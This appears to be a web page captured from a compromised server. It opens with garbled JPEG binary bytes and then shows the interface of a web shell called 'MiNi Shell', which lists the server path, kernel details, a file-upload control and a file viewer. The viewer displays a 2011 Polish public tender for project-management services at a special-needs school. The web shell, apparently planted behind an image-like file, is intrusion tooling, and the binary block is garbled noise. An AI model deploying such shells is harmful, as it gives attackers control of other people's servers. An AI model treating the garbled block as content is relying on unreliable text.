JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111122/391050-N-2011.html

<p class="kh_header"><b>Wierzbice: Usługi dotyczące zarządzania projektem pn.: Uczyć się, aby być, wiedzieć, działać   i żyć wspólnie w społeczeństwie, w podziale na 3 zadania</b><br>
<b>Numer ogłoszenia: 391050 - 2011; data zamieszczenia: 22.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Specjalnych , ul. Lipowa 44, 55-040 Wierzbice, woj. dolnośląskie, tel. 71 390 8778, faks 71 390 87 78.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Publiczna jednostka oświatowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi dotyczące zarządzania projektem pn.: Uczyć się, aby być, wiedzieć, działać   i żyć wspólnie w społeczeństwie, w podziale na 3 zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi dotyczące zarządzania projektem pn.: Uczyć się, aby być, wiedzieć, działać   i żyć wspólnie w społeczeństwie realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych, współfinansowanego z Europejskiego Funduszu Społecznego, w podziale na 3 zadania:
Zadanie 1 - świadczenie usługi Koordynatora Projektu  
Zadanie 2 - świadczenie usługi Asystenta Koordynatora projektu  
Zadanie 3 - świadczenie usługi Specjalisty ds. rozliczeniowo-finansowych projektu Opis projektu:
1) Beneficjentem projektu jest Powiat Wrocławski. Projekt będzie realizowany w Zespole Szkół Specjalnych przy Zakładzie Opiekuńczo-Leczniczym (ZSSwW) w Wierzbicach, ul. Lipowa 44, Gmina Kobierzyce. Organem prowadzącym ZSSwW jest Powiat Wrocławski. Nr ewidencyjny projektu: POKL.09.01.02-02-016/11.
2) Celem głównym projektu jest: wyrównywanie szans edukacyjnych uczniów o specjalnych potrzebach edukacyjnych, mających problemy w nauce, zagrożonych wykluczeniem społecznym oraz przedwczesnym wypadnięciem z systemu oświaty poprzez wdrożenie programu ukierunkowanego na podwyższenie jakości usług edukacyjnych.
Cele szczegółowe projektu:
1) wyrównywanie deficytów rozwojowych i społecznych, kształtowanie procesów motywacyjnych emocjonalnych, poznawczych i społecznych poprzez organizację wieloprofilowego wsparcia w postaci opieki i doradztwa psychologiczno-pedagogicznego,
2) rozwój kompetencji kluczowych poprzez organizację zajęć pozalekcyjnych i pozaszk lnych,
3) podniesienie poziomu wiedzy i świadomości w zakresie wyboru ścieżki zawodowej poprzez powołanie i wsparcie SZOK-u (Szkolnego Ośrodka Kariery), w ramach którego zorganizuje się indywidualne i grupowe poradnictwo zawodowe,
4) podniesienie kompetencji kadry dydaktyczno-pedagogicznej poprzez udział w zajęciach szkoleniowo-warsztatowych wprowadzających tematykę równości płci do procesu nauczania,
5) promocja uczniów niepełnosprawnych na lokalnym i regionalnym rynku pracy.
4) Projekt skierowany jest bezpośrednio do: 56 uczniów Zespołu Szkół Specjalnych w Wierzbicach oraz 20 nauczycieli Zespołu Szkół Specjalnych w Wierzbicach.
5) Wsparciem w ramach projektu objęte są szkoły kształcenia specjalnego (art. 3 pkt. 1a Ustawy  o systemie oświaty z dnia 7.09.1991 r. z późn. zm.) - kształcące uczniów posiadających orzeczenie o potrzebie kształcenia specjalnego. Szkoły mieszczą się przy Zakładzie Opiekuńczo-Leczniczym dla dzieci prowadzonym przez Zgromadzenie Sióstr Św. Józefa w Wierzbicach. Większość uczniów objętych projektem jest wychowankami Specjalnego Ośrodka Wychowawczego prowadzonego przez Siostry ze Zgromadzenia Św. Józefa.
6) Okres realizacji projektu: od dnia 03.01.2012 r. do dnia 28.02.2013 r.
7) Zadania w ramach projektu:
a) Rekrutacja  i selekcja do projektu. Odpowiedzialni: Asystent Koordynatora projektu, Psycholog szkolny, Dyrektor ZSSwW.
b) Wieloprofilowe wsparcie doradcze oraz opieka pedagogiczno-psychologiczno-specjalistyczna. Odpowiedzialni: Koordynator, psychologowie, terapeuci.
c) Wsparcie uczniów w ramach dodatkowych zajęć pozalekcyjnych. Odpowiedzialni: nauczyciele przedmiotów.
d) Wsparcie uczniów w ramach dodatkowych zajęć pozaszkolnych. Odpowiedzialni: Koordynator projektu, Asystent Koordynatora projektu.
e) Powołanie i wsparcie wspólnego dla Gimnazjum i Liceum Szkolnego Ośrodka Kariery (SZOK). Odpowiedzialni: Asystent Koordynatora projektu, doradcy zawodowi.
f) Szkolenia i warsztaty dla kadry dydaktyczno-pedagogicznej. Odpowiedzialni: Asystent Koordynatora projektu.
g) Konferencja promująca niepełnosprawnych na regionalnym rynku pracy oraz upowszechniająca tzw. dobre praktyki. Odpowiedzialni: Koordynator projektu, Asystent Koordynatora projektu.
8) W okresie realizacji projektu Biuro Projektu będzie prowadzone w ZSSwW, co zapewni możliwość osobistego kontaktu uczestników projektu i ich opiekunom z kadrą projektu. Biuro projektu będzie czynne od poniedziałku do piątku w godz. 13.00 - 17.00. 
9)Zgodnie z Zasadami finansowania Programu Operacyjnego Kapitał Ludzki z dnia 21 grudnia 2010 r.: osoby zatrudnione, jako personel projektu (w tym przypadku: Koordynator projektu , Asystent Koordynatora projektu ,Specjalista ds. rozliczeniowo-finansowych projektu) muszą prowadzić ewidencję godzin i zadań realizowanych w ramach wszystkich projektów, w które ta osoba jest zaangażowana oraz udostępniać Zamawiającemu ww. ewidencję godzin w okresie realizacji zadań w ramach niniejszego projektu pn.: Uczyć się, aby być, wiedzieć, działać i żyć wspólnie w społeczeństwie. Przed podpisaniem umowy osoba realizująca zamówienie zobowiązana będzie dostarczyć Zamawiającemu podpisane Oświadczenie, w którym przedstawia swoje zaangażowanie w realizację innych projektów finansowanych w ramach PO KL, jak również w ramach innych programów NSRO. Osoba ta ponadto w Oświadczeniu oświadcza, iż na bieżąco prowadzić będzie ewidencję godzin i zadań realizowanych w ramach wszystkich projektów finansowanych  w ramach PO KL, jak również w ramach innych programów NSRO, w tym w ramach przedmiotowego projektu, i udostępniać ją będzie Zamawiającemu w terminie do 5 dni roboczych każdego następnego miesiąca dotyczącego okresu realizacji projektu. Ewidencja godzin i zadań dotyczy okresu realizacji przedmiotowego projektu. W przypadku gdy osoba zatrudniona jako personel u jednego Beneficjenta w trakcie tego zatrudnienia zaczyna pracę w kolejnym projekcie u innego Beneficjenta, jest ona zobowiązana do prowadzenia ewidencji godzin i zadań od momentu podjęcia zatrudnienia w drugim projekcie, obejmującej obydwa projekty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.22.40.00-1, 79.42.00.00-4, 79.42.10.00-1, 75.11.21.00-5, 79.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 03.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia przez Wykonawców wadium dla żadnej z części przedmiotu zamówienia</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)dla Zadania 1: warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż wykonał, a w przypadku świadczeń okresowych lub ciągłych - wykonuje, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 1 zadanie obejmujące świadczenie usługi Koordynatora Projektu w zakresie zarządzania projektami realizowanymi ze środków publicznych,
b)dla Zadania 2: warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż wykonał, a w przypadku świadczeń okresowych lub ciągłych - wykonuje, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 1 zadanie obejmujące świadczenie usługi przynajmniej na stanowisku Asystenta Koordynatora projektu w zakresie zarządzania projektami realizowanymi ze środków publicznych,
c)dla Zadania 3: warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż wykonał, a w przypadku świadczeń okresowych lub ciągłych - wykonuje, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 1 zadanie obejmujące świadczenie usługi przynajmniej na stanowisku Specjalisty ds. rozliczeniowo-finansowych projektu w zakresie zarządzania projektami realizowanymi ze środków publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) dla Zadania 1 - Wykonawca dysponujący przynajmniej jedną osobą, która posiada:
a.1) wyższe wykształcenie,
a.2) ukończone studia/kurs z zakresu pozyskiwania funduszy zewnętrznych lub zarządzania,
a.3) doświadczenie na stanowisku związanym z zarządzaniem projektami w co najmniej 1 projekcie realizowanym ze środków publicznych,
a.4) znajomość obsługi komputera - MS Office: Word, Excel, Power Point, Outlook oraz  wszystkich aplikacji programowych niezbędnych do realizacji projektu,
a.5) znajomość dokumentów programowych dla PO KL na lata 2007-2013, dokumentów i wytycznych krajowych oraz wspólnotowych niezbędnych do prawidłowej realizacji i rozliczania projektów.
b) dla Zadania 2 - Wykonawca dysponujący przynajmniej jedną osobą, która posiada:
b.1) wyższe wykształcenie,
b.2) ukończone studia/kurs z zakresu pozyskiwania funduszy zewnętrznych  lub zarządzania,
b.3) doświadczenie na stanowisku związanym z zarządzaniem projektami  w co najmniej 1 projekcie realizowanym ze środków publicznych,
b.4) znajomość obsługi komputera - MS Office: Word, Excel, Power Point, Outlook oraz  wszystkich aplikacji programowych niezbędnych do realizacji projektu, 
b.5) znajomość dokumentów programowych dla PO KL na lata 2007-2013, dokumentów  i wytycznych krajowych oraz wspólnotowych niezbędnych do prawidłowej realizacji i rozliczania projektów.
c) dla Zadania 3 - Wykonawca dysponujący przynajmniej jedną osobą, która posiada:
c.1) wyższe wykształcenie,
c.2) ukończone studia/kurs z zakresu pozyskiwania funduszy zewnętrznych, zarządzania lub ekonomii,
c.3) doświadczenie na stanowisku związanym z zarządzaniem projektami w co najmniej 1 projekcie realizowanym ze środków publicznych,
c.4) znajomość obsługi komputera - MS Office: Word, Excel, Power Point, Outlook oraz  wszystkich aplikacji programowych niezbędnych do realizacji projektu, 
c.5) znajomość dokumentów programowych dla PO KL na lata 2007-2013, dokumentów i wytycznych krajowych oraz wspólnotowych niezbędnych do prawidłowej realizacji i rozliczania projektu między innymi: znajomość ustawy o finansach publicznych, ustawy o rachunkowości.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zakazane są istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba, że nastąpi jedna z poniższych okoliczności:
1) W każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego (np. powoduje skrócenie terminu realizacji umowy, zmniejszenie wartości zamówienia),
2) Przypadki losowe (np., zgony), które będą miały wpływ na treść zawartej umowy i termin realizacji,
3) Obniżenie wynagrodzenia Wykonawcy,
4) Zmiana terminu realizacji Projektu, w ramach którego umowa jest realizowana, co będzie miało wpływ na zmianę terminu obowiązywania umowy,
5) Zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy Zmiany będące następstwem działania organów administracji.
2. Zmiany, o których wyżej mowa, powinny zostać wprowadzone na pisemny wniosek jednej ze stron, drogą uzgodnionego przez strony aneksu do umowy o zamówienie publiczne, sporządzonego w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsswierzbice.szkolnastrona.pl i http://powiatwroclawski.ibip.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek Wykonawcy specyfikację istotnych warunków zamówienia można uzyskać w Starostwie Powiatowym we Wrocławiu, ul. Kościuszki 131, pok. 103 I p. -bezpłatnie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2011 godzina 12:00, miejsce: w siedzibie Starostwa Powiatowego we Wrocławiu 
ul. Kościuszki 131
50-440 Wrocław
w Kancelarii - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest realizowane w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych, współfinansowanego z Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - świadczenie usługi Koordynatora Projektu pn.: Uczyć się, aby być, wiedzieć, działać i żyć wspólnie w społeczeństwie, w ilości 80 godzin miesięcznie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres obowiązków:
1) bieżący nadzór nad całością działań zaplanowanych w ramach projektu - nadzór nad postępem rzeczowym i finansowym projektu, nad osiągnięciem zaplanowanych celów w ramach projektu, nad terminowym i zgodnym z budżetem projektu wydatkowaniem środków (kontrola realizacji budżetu Projektu oraz ewidencji kosztów, tak aby umożliwić skuteczne i prawidłowe rozliczenie projektu, kontrola wydatkowania środków zgodnie z Ustawą Prawo Zamówień Publicznych, nadzór nad przygotowywaniem dokumentów wynikających z realizacji projektu, przygotowanie dokumentów, o które poprosi Zamawiający),
2) zarządzanie merytoryczno-finansowe, w tym udział w kontrolach prowadzonych przez uprawnione organy, również po upływie terminu realizacji umowy dotyczącej niniejszego zamówienia, w zakresie objętym umową o dofinansowanie dla niniejszego projektu,
3) utrzymywanie kontaktów z Instytucją Pośredniczącą, Zamawiającym oraz Projektodawcą - przygotowywanie korespondencji dotyczącej bieżących kontaktów z IP w zakresie dotyczącym realizacji Projektu,
4) udział osobisty oraz nadzór nad bieżącą realizacją poszczególnych form wsparcia w ramach projektu - tj. nad przyjętymi do realizacji w ramach Szkolnego Programu Rozwojowego w ZSSwW dodatkowych zajęć pozalekcyjnych i pozaszkolnych rozwijających kompetencje kluczowe uczniów, wzmacniających ich aspiracje edukacyjne oraz rozbudzających ich ciekawość i aktywność poznawczą; wieloprofilowego wsparcia i opieki psychologiczno-pedagogicznej; doradztwa zawodowego poprzez powołanie i wsparcie Szkolnego Ośrodka Kariery - zgodnie z wymogami POKL oraz obowiązującymi przepisami krajowymi, w oparciu o Umowę o dofinansowanie wraz z załącznikami,
5) kontakty ze specjalistami, nauczycielami, trenerami, terapeutami i kontrahentami - nadzór nad prawidłową realizacją zadań przez wszystkie osoby zatrudnione na rzecz projektu, zgodnie z zawartymi umowami,
6) przeprowadzanie kontroli szkoleń,
7) przygotowanie w imieniu Zamawiającego dokumentacji w celu przeprowadzenia postępowań o udzielenie zamówień publicznych związanych z realizacją projektu, zgodnie z jego budżetem na podstawie umowy o dofinansowanie projektu oraz na żądanie Zamawiającego wzięcie udziału w przeprowadzeniu postępowań o zamówienia publicznego,
8) przygotowanie projektów umów z wykonawcami i dostawcami,
9) niezwłoczne powiadamianie każdorazowo Zamawiającego oraz Projektodawcę o zagrożeniach i zmianach w realizacji projektu (każda zmiana musi zostać zaakceptowana przez Zamawiającego, Projektodawcę  oraz Instytucje Pośredniczącą),
10) sporządzanie comiesięcznych protokołów z przeprowadzonych działań w ramach projektu i ich przekazywanie Zamawiającemu w terminie do 5 dni roboczych każdego następnego miesiąca dotyczącego okresu realizacji projektu,
11) współpraca ze wszystkimi osobami zaangażowanymi w realizację projektu w celu zapewnienia prawidłowego przepływu informacji w sprawach, za które odpowiedzialny jest Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.22.40.00-1, 79.42.00.00-4, 79.42.10.00-1, 75.11.21.00-5, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - świadczenie usługi Asystenta Koordynatora projektu pn.: Uczyć się, aby być, wiedzieć, działać i żyć wspólnie w społeczeństwie, w ilości 80 godzin miesięcznie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres obowiązków:
1) promocja projektu - prowadzenie działań informacyjno-promocyjnych,
2) pozyskanie grupy docelowej - rekrutacja uczestników projektu,
3) obsługa Biura Projektu,
4) gromadzenie i archiwizowanie dokumentacji projektowej,
5) udział osobisty w przedsięwzięciach realizowanych w ramach projektu, obsługa uczestników projektu,
6) opracowanie programów i harmonogramów form wsparcia, zajęć w ramach SzPR,
7) przygotowanie w imieniu Zamawiającego postępowań o udzielenie zamówień publicznych związanych z realizacją projektu, zgodnie z jego budżetem na podstawie umowy o dofinansowanie projektu oraz na żądanie Zamawiającego wzięcie udziału w przeprowadzeniu postępowań o zamówienia publicznego,
8) niezwłoczne powiadamianie każdorazowo Zamawiającego o zagrożeniach i zmianach w realizacji projektu (każda zmiana musi zostać zaakceptowana przez Koordynatora Projektu, Zamawiającego, Projektodawcę oraz IP),
9) sporządzanie comiesięcznych protokołów z przeprowadzonych działań w ramach projektu i ich przekazywanie Zamawiającemu w terminie do 5 dni roboczych każdego następnego miesiąca dotyczącego okresu realizacji projektu,
10) współpraca ze wszystkimi osobami zaangażowanymi w realizację projektu w celu zapewnienia prawidłowego przepływu informacji w sprawach, za które odpowiedzialny jest Wykonawca..</p></li>
